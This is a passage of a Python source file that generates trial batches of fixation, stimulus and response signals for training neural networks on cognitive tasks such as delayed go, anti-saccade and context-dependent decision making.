'delaydm1', 'delaydm2', 'contextdelaydm1', 'contextdelaydm2', 'multidelaydm',
'dmsgo', 'dmsnogo', 'dmcgo', 'dmcnogo'],
'mante' : ['contextdm1', 'contextdm2'],
'oicdmc' : ['oic', 'dmc']}
# Store indices of rules
rule_index_map = dict()
for ruleset, rules in rules_dict.items():
rule_index_map[ruleset] = dict()
for ind, rule in enumerate(rules):
rule_index_map[ruleset][rule] = ind
def get_num_ring(ruleset):
    """Number of stimulus rings used by the given ruleset."""
    if ruleset == 'oicdmc':
        return 3
    return 2
def get_num_rule(ruleset):
    """Number of rules contained in the given ruleset."""
    rules = rules_dict[ruleset]
    return len(rules)
def get_rule_index(rule, config):
    """Index of the input unit encoding `rule` for this model config."""
    offset = config['rule_start']
    return offset + rule_index_map[config['ruleset']][rule]
def get_dist(original_dist):
    """Shortest angular distance under the 2*pi periodic boundary."""
    magnitude = abs(original_dist)
    return np.minimum(magnitude, 2 * np.pi - magnitude)
class Trial(object):
    """Class representing a batch of trials.

    Holds the input tensor ``x`` and target tensor ``y`` (both shaped
    (time, batch, units)) plus the target response location ``y_loc``.
    """

    def __init__(self, config, tdim, batch_size):
        """A batch of trials.

        Args:
            config: dictionary of configurations
            tdim: int, number of time steps
            batch_size: int, batch size
        """
        self.float_type = 'float32' # This should be the default
        self.config = config
        self.dt = self.config['dt']

        self.n_eachring = self.config['n_eachring']
        self.n_input = self.config['n_input']
        self.n_output = self.config['n_output']
        self.pref = np.arange(0,2*np.pi,2*np.pi/self.n_eachring) # preferences

        self.batch_size = batch_size
        self.tdim = tdim
        self.x = np.zeros((tdim, batch_size, self.n_input), dtype=self.float_type)
        self.y = np.zeros((tdim, batch_size, self.n_output), dtype=self.float_type)
        if self.config['loss_type'] == 'lsq':
            # Least-squares targets rest at a small positive baseline.
            self.y[:,:,:] = 0.05
        # y_loc is the stimulus location of the output, -1 for fixation, (0,2 pi) for response
        self.y_loc = -np.ones((tdim, batch_size) , dtype=self.float_type)

        # Input noise scale; derived from sigma_x and the integration alpha.
        self._sigma_x = config['sigma_x']*np.sqrt(2/config['alpha'])

    def expand(self, var):
        """Expand an int/float to list."""
        if not hasattr(var, '__iter__'):
            var = [var] * self.batch_size
        return var

    def add(self, loc_type, locs=None, ons=None, offs=None, strengths=1, mods=None):
        """Add an input or stimulus output.

        Args:
            loc_type: str (fix_in, stim, fix_out, out), type of information to be added
            locs: array of list of float (batch_size,), locations to be added, only for loc_type=stim or out
            ons: int or list, index of onset time
            offs: int or list, index of offset time
            strengths: float or list, strength of input or target output
            mods: int or list, modalities of input or target output
        """
        ons = self.expand(ons)
        offs = self.expand(offs)
        strengths = self.expand(strengths)
        mods = self.expand(mods)

        for i in range(self.batch_size):
            if loc_type == 'fix_in':
                # Unit 0 of the input is the fixation cue.
                self.x[ons[i]: offs[i], i, 0] = 1
            elif loc_type == 'stim':
                # Assuming that mods[i] starts from 1
                self.x[ons[i]: offs[i], i, 1+(mods[i]-1)*self.n_eachring:1+mods[i]*self.n_eachring] \
                    += self.add_x_loc(locs[i])*strengths[i]
            elif loc_type == 'fix_out':
                # Notice this shouldn't be set at 1, because the output is logistic and saturates at 1
                if self.config['loss_type'] == 'lsq':
                    self.y[ons[i]: offs[i], i, 0] = 0.8
                else:
                    self.y[ons[i]: offs[i], i, 0] = 1.0
            elif loc_type == 'out':
                if self.config['loss_type'] == 'lsq':
                    self.y[ons[i]: offs[i], i, 1:] += self.add_y_loc(locs[i])*strengths[i]
                else:
                    # Cross-entropy targets: normalized bump over the ring.
                    y_tmp = self.add_y_loc(locs[i])
                    y_tmp /= np.sum(y_tmp)
                    self.y[ons[i]: offs[i], i, 1:] += y_tmp
                self.y_loc[ons[i]: offs[i], i] = locs[i]
            else:
                raise ValueError('Unknown loc_type')

    def add_x_noise(self):
        """Add input noise."""
        self.x += self.config['rng'].randn(*self.x.shape)*self._sigma_x

    def add_c_mask(self, pre_offs, post_ons):
        """Add a cost mask.

        Usually there are two periods, pre and post response
        Scale the mask weight for the post period so in total it's as important
        as the pre period
        """
        pre_on = int(100/self.dt) # never check the first 100ms
        pre_offs = self.expand(pre_offs)
        post_ons = self.expand(post_ons)

        if self.config['loss_type'] == 'lsq':
            c_mask = np.zeros((self.tdim, self.batch_size, self.n_output), dtype=self.float_type)
            for i in range(self.batch_size):
                # Post response periods usually have the same length across tasks
                c_mask[post_ons[i]:, i, :] = 5.
                # Pre-response periods usually have different lengths across tasks
                # To keep cost comparable across tasks
                # Scale the cost mask of the pre-response period by a factor
                c_mask[pre_on:pre_offs[i], i, :] = 1.

            # self.c_mask[:, :, 0] *= self.n_eachring # Fixation is important
            c_mask[:, :, 0] *= 2. # Fixation is important

            self.c_mask = c_mask.reshape((self.tdim*self.batch_size, self.n_output))
        else:
            c_mask = np.zeros((self.tdim, self.batch_size), dtype=self.float_type)
            for i in range(self.batch_size):
                # Post response periods usually have the same length across tasks
                # Having it larger than 1 encourages the network to achieve higher performance
                c_mask[post_ons[i]:, i] = 5.
                # Pre-response periods usually have different lengths across tasks
                # To keep cost comparable across tasks
                # Scale the cost mask of the pre-response period by a factor
                c_mask[pre_on:pre_offs[i], i] = 1.

            self.c_mask = c_mask.reshape((self.tdim*self.batch_size,))
            self.c_mask /= self.c_mask.mean()

    def add_rule(self, rule, on=None, off=None, strength=1.):
        """Add rule input."""
        if isinstance(rule, int):
            # An int rule is taken as an offset from rule_start directly.
            self.x[on:off, :, self.config['rule_start']+rule] = strength
        else:
            ind_rule = get_rule_index(rule, self.config)
            self.x[on:off, :, ind_rule] = strength

    def add_x_loc(self, x_loc):
        """Input activity given location."""
        dist = get_dist(x_loc-self.pref)  # periodic boundary
        dist /= np.pi/8
        return 0.8*np.exp(-dist**2/2)

    def add_y_loc(self, y_loc):
        """Target response given location."""
        dist = get_dist(y_loc-self.pref)  # periodic boundary
        if self.config['loss_type'] == 'lsq':
            dist /= np.pi/8
            y = 0.8*np.exp(-dist**2/2)
        else:
            # One-hot output
            y = np.zeros_like(dist)
            ind = np.argmin(dist)
            y[ind] = 1.
        return y
def test_init(config, mode, **kwargs):
    '''
    Test initialization of model. mode is not actually used
    Fixation is on then off.
    '''
    dt = config['dt']
    total_steps = int(10000/dt)
    fixation_offs = [int(800/dt)]

    trial = Trial(config, total_steps, 1)
    trial.add('fix_in', offs=fixation_offs)
    return trial
def delaygo_(config, mode, anti_response, **kwargs):
    '''
    Fixate whenever fixation point is shown,
    saccade to the location of the previously shown stimulus
    whenever the fixation point is off
    Generate one batch of trials

    The fixation is shown between (0, fix_off)
    The stimulus is shown between (stim_on, stim_off)

    The output should be fixation location for (0, fix_off)
    and the stimulus location for (fix_off, T)

    :param mode: the mode of generating. Options: 'random', 'explicit'...
    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param tdim: dimension of time (required for mode=='sample')
    :param param: a dictionary of parameters (required for mode=='explicit')
    :return: 2 Tensor3 data array (Time, Batchsize, Units)
    '''
    dt = config['dt']
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']

        # A list of locations of stimuluss and on/off time
        stim_locs = rng.rand(batch_size)*2*np.pi
        # stim_ons = int(500/dt)
        stim_ons = int(rng.choice([300, 500, 700])/dt)
        # stim_offs = stim_ons + int(200/dt)
        stim_offs = stim_ons + int(rng.choice([200, 400, 600])/dt)
        fix_offs = stim_offs + int(rng.choice([200, 400, 800, 1600])/dt)
        # fix_offs = stim_offs + int(rng.choice([1600])/dt)
        tdim = fix_offs + int(500/dt)
        stim_mod = rng.choice([1,2])

    elif mode == 'test':
        # Fixed grid over 20 locations x 2 modalities.
        tdim = int(2500/dt)
        n_stim_loc, n_stim_mod = batch_shape = 20, 2
        batch_size = np.prod(batch_shape)
        ind_stim_loc, ind_stim_mod = np.unravel_index(range(batch_size),batch_shape)

        fix_offs = int(2000/dt)
        stim_locs = 2*np.pi*ind_stim_loc/n_stim_loc
        stim_ons = int(500/dt)
        stim_mod = ind_stim_mod + 1
        stim_offs = int(1000/dt)

    elif mode == 'psychometric':
        # All timing and locations supplied explicitly by the caller.
        p = kwargs['params']
        stim_locs = p['stim_locs']
        # Time of stimuluss on/off
        stim_ons = int(p['stim_ons']/dt)
        stim_offs = int(p['stim_offs']/dt)
        delay_time = int(p['delay_time']/dt)
        fix_offs = stim_offs + delay_time
        tdim = int(400/dt) + fix_offs
        stim_mod = 1

        batch_size = len(stim_locs)

    else:
        raise ValueError('Unknown mode: ' + str(mode))

    # Time to start checking the saccade location.
    check_ons = fix_offs + int(100/dt)

    # Response locations
    stim_locs = np.array(stim_locs)
    if not anti_response:
        response_locs = stim_locs
    else:
        # Anti task: respond opposite the stimulus.
        response_locs = (stim_locs+np.pi)%(2*np.pi)

    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in', offs=fix_offs)
    trial.add('stim', stim_locs, ons=stim_ons, offs=stim_offs, mods=stim_mod)
    trial.add('fix_out', offs=fix_offs)
    trial.add('out', response_locs, ons=fix_offs)
    trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)

    trial.epochs = {'fix1' : (None, stim_ons),
                    'stim1' : (stim_ons, stim_offs),
                    'delay1' : (stim_offs, fix_offs),
                    'go1' : (fix_offs, None)}

    return trial
def delaygo(config, mode, **kwargs):
    # Standard (non-anti) delayed-go task.
    return delaygo_(config, mode, False, **kwargs)
def contextdm_genstim(batch_size, rng, stim_coh_range=None):
    """Sample paired stimulus strengths for a decision-making modality.

    Returns two arrays of shape (batch_size,): a shared mean plus/minus a
    signed coherence, so their sum is twice the mean.
    """
    base = rng.uniform(0.8, 1.2, (batch_size,))
    if stim_coh_range is None:
        stim_coh_range = np.array([0.16, 0.32, 0.64]) * 1.0
    coherence = rng.choice(stim_coh_range, (batch_size,))
    sign = rng.choice([+1, -1], (batch_size,))
    return base + coherence * sign, base - coherence * sign
def _contextdm(config, mode, attend_mod, **kwargs):
    '''
    Fixate whenever fixation point is shown.
    Two stimuluss are shown in each ring,
    Saccade to the one with higher intensity for the attended ring
    Generate one batch of trials

    The fixation is shown between (0, fix_off)
    The two stimuluss is shown between (0,T)

    The output should be fixation location for (0, fix_off)
    Otherwise the location of the stronger stimulus

    In this task, if the model's strategy is to ignore context, and integrate both,
    then the maximum performance is 75%. So we need to make the highest correct performance
    much higher than that.

    :param mode: the mode of generating. Options: 'random', 'explicit'...
    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param tdim: dimension of time (required for mode=='sample')
    :param param: a dictionary of parameters (required for mode=='explicit')
    :return: 2 Tensor3 data array (Time, Batchsize, Units)
    '''
    dt = config['dt']
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']

        # A list of locations of stimuluss, same locations for both modalities
        stim_dist = rng.uniform(0.5*np.pi, 1.5*np.pi,(batch_size,))*rng.choice([-1,1],(batch_size,))
        stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
        stim2_locs = (stim1_locs+stim_dist)%(2*np.pi)

        stim_coh_range = np.array([0.01, 0.02, 0.04, 0.08])
        if ('easy_task' in config) and config['easy_task']:
            # stim_coh_range = np.array([0.1, 0.2, 0.4, 0.8])
            stim_coh_range *= 10

        if (attend_mod == 1) or (attend_mod == 2):
            # Each modality gets its own independent strength pair.
            stim1_mod1_strengths, stim2_mod1_strengths = contextdm_genstim(batch_size, rng, stim_coh_range)
            stim1_mod2_strengths, stim2_mod2_strengths = contextdm_genstim(batch_size, rng, stim_coh_range)
            if attend_mod == 1:
                stim1_strengths, stim2_strengths = stim1_mod1_strengths, stim2_mod1_strengths
            else:
                stim1_strengths, stim2_strengths = stim1_mod2_strengths, stim2_mod2_strengths
        else:
            # 'both': draw combined strengths, then split across modalities.
            stim1_strengths, stim2_strengths = contextdm_genstim(batch_size, rng, stim_coh_range)

            # NOTE(review): these draws use the global np.random instead of
            # the seeded `rng` above — this breaks reproducibility of trial
            # generation; confirm whether that is intentional.
            stim1_mod12_diff = stim1_strengths * \
                np.random.uniform(0.2, 0.8, (batch_size,)) * \
                np.random.choice([+1, -1], (batch_size,))
            stim1_mod1_strengths = stim1_strengths + stim1_mod12_diff/2
            stim1_mod2_strengths = stim1_strengths - stim1_mod12_diff/2

            stim2_mod12_diff = stim2_strengths * \
                np.random.uniform(0.2, 0.8, (batch_size,)) * \
                np.random.choice([+1, -1], (batch_size,))
            stim2_mod1_strengths = stim2_strengths + stim2_mod12_diff/2
            stim2_mod2_strengths = stim2_strengths - stim2_mod12_diff/2

        # Time of stimuluss on/off
        stim_on = int(rng.uniform(100,400)/dt)
        stim_ons = (np.ones(batch_size)*stim_on).astype(int)
        stim_dur = int(rng.choice([400, 800, 1600])/dt)
        # stim_dur = rng.choice((np.array([200, 400, 800, 1600])/dt).astype(int)) # Current setting
        # stim_dur = int(rng.uniform(500, 1000)/dt) # Current setting
        # stim_dur = int(800/dt)
        stim_offs = stim_ons+stim_dur
        # delay_dur = rng.choice((np.array([200, 400, 800])/dt).astype(int)) # Current setting
        delay_dur = 0
        fix_offs = stim_offs + delay_dur

        # each batch consists of sequences of equal length
        tdim = stim_on+stim_dur+delay_dur+int(500/dt)

    elif mode == 'test':
        # Fixed grid: 20 locations x 5 mod1 strengths x 5 mod2 strengths.
        tdim = int(2000/dt)
        n_stim_loc, n_stim_mod1_strength, n_stim_mod2_strength = batch_shape = 20, 5, 5
        batch_size = np.prod(batch_shape)
        ind_stim_loc, ind_stim_mod1_strength, ind_stim_mod2_strength = np.unravel_index(range(batch_size),batch_shape)

        fix_offs = int(1500/dt)

        stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
        stim2_locs = (stim1_locs+np.pi)%(2*np.pi)
        stim1_mod1_strengths = 0.4*ind_stim_mod1_strength/n_stim_mod1_strength+0.8
        stim2_mod1_strengths = 2 - stim1_mod1_strengths
        stim1_mod2_strengths = 0.4*ind_stim_mod2_strength/n_stim_mod2_strength+0.8
        stim2_mod2_strengths = 2 - stim1_mod2_strengths
        stim_ons = int(500/dt)
        stim_offs = int(1500/dt)

    elif mode == 'psychometric':
        # All locations/strengths/timing supplied explicitly by the caller.
        p = kwargs['params']
        stim1_locs = p['stim1_locs']
        stim2_locs = p['stim2_locs']
        stim1_mod1_strengths = p['stim1_mod1_strengths']
        stim2_mod1_strengths = p['stim2_mod1_strengths']
        stim1_mod2_strengths = p['stim1_mod2_strengths']
        stim2_mod2_strengths = p['stim2_mod2_strengths']
        stim_time = int(p['stim_time']/dt)
        batch_size = len(stim1_locs)

        # Time of stimuluss on/off
        stim_ons = int(500/dt)
        stim_offs = stim_ons + stim_time
        fix_offs = stim_offs
        tdim = int(500/dt) + fix_offs

    else:
        raise ValueError('Unknown mode: ' + str(mode))

    # time to check the saccade location
    check_ons = fix_offs + int(100/dt)

    # Which modality's strengths determine the correct response.
    if attend_mod == 1:
        stim1_strengths, stim2_strengths = stim1_mod1_strengths, stim2_mod1_strengths
    elif attend_mod == 2:
        stim1_strengths, stim2_strengths = stim1_mod2_strengths, stim2_mod2_strengths
    elif attend_mod == 'both':
        stim1_strengths = stim1_mod1_strengths + stim1_mod2_strengths
        stim2_strengths = stim2_mod1_strengths + stim2_mod2_strengths

    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in', offs=fix_offs)
    trial.add('stim', stim1_locs, ons=stim_ons, offs=stim_offs, strengths=stim1_mod1_strengths, mods=1)
    trial.add('stim', stim2_locs, ons=stim_ons, offs=stim_offs, strengths=stim2_mod1_strengths, mods=1)
    trial.add('stim', stim1_locs, ons=stim_ons, offs=stim_offs, strengths=stim1_mod2_strengths, mods=2)
    trial.add('stim', stim2_locs, ons=stim_ons, offs=stim_offs, strengths=stim2_mod2_strengths, mods=2)
    trial.add('fix_out', offs=fix_offs)
    # Correct response: the stimulus with the larger attended strength.
    stim_locs = [stim1_locs[i] if (stim1_strengths[i]>stim2_strengths[i])
                 else stim2_locs[i] for i in range(batch_size)]
    trial.add('out', stim_locs, ons=fix_offs)
    trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)

    trial.epochs = {'fix1' : (None, stim_ons),
                    'stim1' : (stim_ons, stim_offs),
                    # 'delay1' : (stim_offs, fix_offs),
                    'go1' : (fix_offs, None)}

    return trial
def contextdm1(config, mode, **kwargs):
    """Context-dependent decision making: attend to modality 1 (wrapper over _contextdm)."""
    return _contextdm(config, mode, 1, **kwargs)
def contextdm2(config, mode, **kwargs):
    """Context-dependent decision making: attend to modality 2 (wrapper over _contextdm)."""
    return _contextdm(config, mode, 2, **kwargs)
def multidm(config, mode, **kwargs):
    """Multi-sensory decision making: integrate both modalities (wrapper over _contextdm)."""
    return _contextdm(config, mode, 'both', **kwargs)
def reactgo_(config, mode, anti_response, **kwargs):
    '''
    Reaction-time (anti-)go task.

    Fixate when fixation point is shown,
    A stimulus will be shown, and the output should saccade to the stimulus location
    (or the diametrically opposite location when anti_response is True).

    Generate one batch of trials

    The fixation input is shown for the whole trial (0, T)
    The stimulus is shown between (stim_ons, T)
    The output should be fixation location for (0, stim_ons)
    Otherwise should be the (anti-)stimulus location

    :param config: dict; uses 'dt' (time step, ms) and 'rng' (seeded random generator)
    :param mode: the mode of generating. Options: 'random', 'test', 'psychometric'
    :param anti_response: bool; if True the target is stimulus location + pi

    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param params: a dictionary of parameters (required for mode=='psychometric')

    :return: a Trial object; its data arrays are (Time, Batchsize, Units)
    '''
    dt = config['dt']
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']
        # each batch consists of sequences of equal length
        # A list of locations of fixation points and fixation off time
        stim_ons = int(rng.uniform(500,2500)/dt)
        tdim = int(500/dt) + stim_ons
        # A list of locations of stimuluss (they are always on)
        stim_locs = rng.uniform(0, 2*np.pi, (batch_size,))
        # a single modality shared by the whole batch
        stim_mod = rng.choice([1,2])
    elif mode == 'test':
        # dense, deterministic coverage: 20 locations x 2 modalities
        tdim = int(2500/dt)
        n_stim_loc, n_stim_mod = batch_shape = 20, 2
        batch_size = np.prod(batch_shape)
        ind_stim_loc, ind_stim_mod = np.unravel_index(range(batch_size),batch_shape)
        stim_ons = int(2000/dt)
        stim_locs = 2*np.pi*ind_stim_loc/n_stim_loc
        stim_mod = ind_stim_mod + 1
    elif mode == 'psychometric':
        p = kwargs['params']
        stim_locs = p['stim_locs']
        batch_size = len(stim_locs)
        # Time of stimuluss on/off
        stim_ons = int(1000/dt)
        tdim = int(400/dt) + stim_ons
        stim_mod = 1
    else:
        raise ValueError('Unknown mode: ' + str(mode))
    # time to check the saccade location
    check_ons = stim_ons + int(100/dt)
    # Response locations
    stim_locs = np.array(stim_locs)
    if not anti_response:
        response_locs = stim_locs
    else:
        # anti task: respond opposite to the stimulus
        response_locs = (stim_locs+np.pi)%(2*np.pi)
    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in')
    trial.add('stim', stim_locs, ons=stim_ons, mods=stim_mod)
    trial.add('fix_out', offs=stim_ons)
    trial.add('out', response_locs, ons=stim_ons)
    trial.add_c_mask(pre_offs=stim_ons, post_ons=check_ons)
    trial.epochs = {'fix1' : (None, stim_ons),
                    'go1' : (stim_ons, None)}
    return trial
def reactgo(config, mode, **kwargs):
    """Reaction-time go task: saccade to the stimulus (wrapper over reactgo_)."""
    return reactgo_(config, mode, False, **kwargs)
def reactanti(config, mode, **kwargs):
    """Reaction-time anti task: saccade opposite to the stimulus (wrapper over reactgo_)."""
    return reactgo_(config, mode, True, **kwargs)
def fdgo_(config, mode, anti_response, **kwargs):
    '''
    Delayed (anti-)go with inhibitory control. Important difference with Go task is that
    the stimulus is presented before the fixation point goes off.

    Fixate whenever fixation point is shown,
    A stimulus will be shown from stim_ons onward,
    And the output should saccade to the stimulus location (or the opposite
    location when anti_response is True) once fixation goes off.

    Generate one batch of trials

    The fixation is shown between (0, fix_offs)
    The stimulus is shown between (stim_ons, T)
    The output should be fixation location for (0, fix_offs)
    Otherwise should be the (anti-)stimulus location

    :param config: dict; uses 'dt' (time step, ms) and 'rng' (seeded random generator)
    :param mode: the mode of generating. Options: 'random', 'test', 'psychometric'
    :param anti_response: bool; if True the target is stimulus location + pi

    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param params: a dictionary of parameters (required for mode=='psychometric')

    :return: a Trial object; its data arrays are (Time, Batchsize, Units)
    '''
    dt = config['dt']
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']
        # each batch consists of sequences of equal length
        # A list of locations of fixation points and fixation off time
        # A list of locations of stimulus (they are always on)
        stim_locs = rng.rand(batch_size)*2*np.pi
        # a single modality shared by the whole batch
        stim_mod = rng.choice([1,2])
        stim_ons = int(rng.uniform(300,700)/dt)
        fix_offs = stim_ons + int(rng.uniform(500,1500)/dt)
        tdim = int(500/dt) + fix_offs
    elif mode == 'test':
        # dense, deterministic coverage: 20 locations x 2 modalities
        tdim = int(2000/dt)
        n_stim_loc, n_stim_mod = batch_shape = 20, 2
        batch_size = np.prod(batch_shape)
        ind_stim_loc, ind_stim_mod = np.unravel_index(range(batch_size),batch_shape)
        stim_ons = int(500/dt)
        fix_offs = int(1500/dt)
        stim_locs = 2*np.pi*ind_stim_loc/n_stim_loc
        stim_mod = ind_stim_mod + 1
    elif mode == 'psychometric':
        p = kwargs['params']
        stim_locs = p['stim_locs']
        stim_time = int(p['stim_time']/dt)
        batch_size = len(stim_locs)
        # Time of stimuluss on/off
        stim_ons = int(300/dt)
        fix_offs = stim_ons + stim_time
        tdim = int(400/dt) + fix_offs
        stim_mod = 1
    else:
        raise ValueError('Unknown mode: ' + str(mode))
    # time to check the saccade location
    check_ons = fix_offs + int(100/dt)
    # Response locations
    stim_locs = np.array(stim_locs)
    if not anti_response:
        response_locs = stim_locs
    else:
        # anti task: respond opposite to the stimulus
        response_locs = (stim_locs+np.pi)%(2*np.pi)
    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in', offs=fix_offs)
    trial.add('stim', stim_locs, ons=stim_ons, mods=stim_mod)
    trial.add('fix_out', offs=fix_offs)
    trial.add('out', response_locs, ons=fix_offs)
    trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
    trial.epochs = {'fix1' : (None, stim_ons),
                    'stim1' : (stim_ons, fix_offs),
                    'go1' : (fix_offs, None)}
    return trial
def fdgo(config, mode, **kwargs):
    """Delayed go task: saccade to the stimulus after fixation off (wrapper over fdgo_)."""
    return fdgo_(config, mode, False, **kwargs)
def fdanti(config, mode, **kwargs):
    """Delayed anti task: saccade opposite to the stimulus after fixation off (wrapper over fdgo_)."""
    return fdgo_(config, mode, True, **kwargs)
def delayanti(config, mode, **kwargs):
    """Delay anti task (wrapper over delaygo_ with anti_response=True)."""
    return delaygo_(config, mode, True, **kwargs)
def _dm(config, mode, stim_mod, **kwargs):
    '''
    Perceptual decision making in a single modality.

    Fixate whenever fixation point is shown.
    Two stimuluss are shown, saccade to the one with higher intensity

    Generate one batch of trials

    The fixation is shown between (0, fix_offs)
    The two stimuluss are shown between (stim_ons, fix_offs)
    The output should be fixation location for (0, fix_offs)
    Otherwise the location of the stronger stimulus

    :param config: dict; uses 'dt', 'rng' and optionally 'easy_task'
    :param mode: the mode of generating. Options: 'random', 'test', 'psychometric'
    :param stim_mod: which modality (ring) carries the stimuli

    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param params: a dictionary of parameters (required for mode=='psychometric')

    :return: a Trial object; its data arrays are (Time, Batchsize, Units)
    '''
    dt = config['dt']
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']
        # A list of locations of stimuluss (they are always on)
        # the two stimuli are separated by 90-270 degrees in either direction
        stim_dist = rng.uniform(0.5*np.pi,1.5*np.pi,(batch_size,))*rng.choice([-1,1],(batch_size,))
        stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
        stim2_locs = (stim1_locs+stim_dist)%(2*np.pi)
        # Target strengths: common mean plus/minus a coherence term
        stims_mean = rng.uniform(0.8,1.2,(batch_size,))
        # stims_diff = rng.uniform(0.01,0.2,(batch_size,))
        # stims_diff = rng.choice([0.02, 0.04, 0.08], (batch_size,)) # Encourage integration
        # stims_coh = rng.choice([0.16, 0.32, 0.64], (batch_size,))
        stim_coh_range = np.array([0.01, 0.02, 0.04, 0.08])
        if ('easy_task' in config) and config['easy_task']:
            # stim_coh_range = np.array([0.1, 0.2, 0.4, 0.8])
            stim_coh_range *= 10
        stims_coh = rng.choice(stim_coh_range, (batch_size,))
        stims_sign = rng.choice([1,-1], (batch_size,))
        stim1_strengths = stims_mean + stims_coh*stims_sign
        stim2_strengths = stims_mean - stims_coh*stims_sign
        # Time of stimuluss on/off
        stim_on = int(rng.uniform(100,400)/dt)
        # per-trial array, same onset for the whole batch
        stim_ons = (np.ones(batch_size)*stim_on).astype(int)
        # stim_dur = int(rng.uniform(300,1500)/dt)
        stim_dur = int(rng.choice([400, 800, 1600])/dt)
        fix_offs = (stim_ons+stim_dur).astype(int)
        # each batch consists of sequences of equal length
        tdim = stim_on+stim_dur+int(500/dt)
    elif mode == 'test':
        # Dense coverage of the stimulus space
        tdim = int(2500/dt)
        n_stim_loc, n_stim1_strength = batch_shape = 20, 5
        batch_size = np.prod(batch_shape)
        ind_stim_loc, ind_stim1_strength = np.unravel_index(range(batch_size),batch_shape)
        fix_offs = int(2000/dt)
        stim1_locs = 2*np.pi*ind_stim_loc/n_stim_loc
        stim2_locs = (stim1_locs+np.pi)%(2*np.pi)
        # strengths sum to 2 so the pair is symmetric around 1
        stim1_strengths = 0.4*ind_stim1_strength/n_stim1_strength+0.8
        stim2_strengths = 2 - stim1_strengths
        stim_ons = int(500/dt)
    elif mode == 'psychometric':
        p = kwargs['params']
        stim1_locs = p['stim1_locs']
        stim2_locs = p['stim2_locs']
        stim1_strengths = p['stim1_strengths']
        stim2_strengths = p['stim2_strengths']
        stim_time = int(p['stim_time']/dt)
        batch_size = len(stim1_locs)
        # Time of stimuluss on/off
        stim_ons = int(300/dt)
        fix_offs = int(300/dt) + stim_time
        tdim = int(400/dt) + fix_offs
    else:
        raise ValueError('Unknown mode: ' + str(mode))
    # time to check the saccade location
    check_ons = fix_offs + int(100/dt)
    trial = Trial(config, tdim, batch_size)
    trial.add('fix_in', offs=fix_offs)
    trial.add('stim', stim1_locs, ons=stim_ons, offs=fix_offs, strengths=stim1_strengths, mods=stim_mod)
    trial.add('stim', stim2_locs, ons=stim_ons, offs=fix_offs, strengths=stim2_strengths, mods=stim_mod)
    trial.add('fix_out', offs=fix_offs)
    # target is the location of the stronger stimulus
    stim_locs = [stim1_locs[i] if (stim1_strengths[i]>stim2_strengths[i])
                 else stim2_locs[i] for i in range(batch_size)]
    trial.add('out', stim_locs, ons=fix_offs)
    trial.add_c_mask(pre_offs=fix_offs, post_ons=check_ons)
    trial.epochs = {'fix1' : (None, stim_ons),
                    'stim1' : (stim_ons, fix_offs),
                    'go1' : (fix_offs, None)}
    return trial
def dm1(config, mode, **kwargs):
    """Decision making in modality 1 (wrapper over _dm)."""
    return _dm(config, mode, 1, **kwargs)
def dm2(config, mode, **kwargs):
    """Decision making in modality 2 (wrapper over _dm)."""
    return _dm(config, mode, 2, **kwargs)
def _delaydm(config, mode, stim_mod, **kwargs):
    '''
    Delayed comparison in a single modality.

    Fixate whenever fixation point is shown.
    Two stimuluss are shown at different time, with different intensities

    The fixation is shown between (0, fix_offs)
    The two stimuluss are shown between (stim1_ons, stim1_offs) and
    (stim2_ons, stim2_offs)
    The output should be fixation location for (0, fix_offs)
    Otherwise the location of the stronger stimulus

    :param config: dict; uses 'dt', 'rng' and optionally 'easy_task'
    :param mode: the mode of generating. Options: 'random', 'test', 'psychometric'
    :param stim_mod: which modality (ring) carries the stimuli

    Optional parameters:
    :param batch_size: Batch size (required for mode=='random')
    :param params: a dictionary of parameters (required for mode=='psychometric')

    :return: a Trial object; its data arrays are (Time, Batchsize, Units)
    '''
    dt = config['dt']
    rng = config['rng']
    if mode == 'random': # Randomly generate parameters
        batch_size = kwargs['batch_size']
        # A list of locations of stimuluss (they are always on)
        # the two stimuli are separated by 90-270 degrees in either direction
        stim_dist = rng.uniform(0.5*np.pi, 1.5*np.pi,(batch_size,))*rng.choice([-1,1],(batch_size,))
        stim1_locs = rng.uniform(0, 2*np.pi, (batch_size,))
        stim2_locs = (stim1_locs+stim_dist)%(2*np.pi)
        # strengths: common mean plus/minus a coherence term
        stims_mean = rng.uniform(0.8,1.2,(batch_size,))
        # stims_diff = rng.choice([0.32,0.64,1.28],(batch_size,))
        stim_coh_range = np.array([0.08,0.16,0.32])
        if ('easy_task' in config) and config['easy_task']:
            # stim_coh_range = np.array([0.16,0.32,0.64])
            stim_coh_range *= 2
        stims_coh = rng.choice(stim_coh_range,(batch_size,))
        stims_sign = rng.choice([1,-1], (batch_size,))
        stim1_strengths = stims_mean + stims_coh*stims_sign
        stim2_strengths = stims_mean - stims_coh*stims_sign
        # stim1_strengths = rng.uniform(0.25,1.75,(batch_size,))
        # stim2_strengths = rng.uniform(0.25,1.75,(batch_size,))
        # Time of stimuluss on/off
        stim1_ons = int(rng.choice([200, 400, 600])/dt)
        stim1_offs = stim1_ons + int(rng.choice([200, 400, 600])/dt)
        stim2_ons = stim1_offs + int(rng.choice([200, 400, 800, 1600])/dt)
        stim2_offs = stim2_ons + int(rng.choice([200, 400, 600])/dt)
        fix_offs = stim2_offs + int(rng.uniform(100,300)/dt)
        # stim2_ons = (np.ones(batch_size)*rng.choice([400,500,600,700,1400])/dt).astype(int)
        # stim2_ons = (np.ones(batch_size)*rng.choice([400,600,1000,1400,2000])/dt).astype(int)
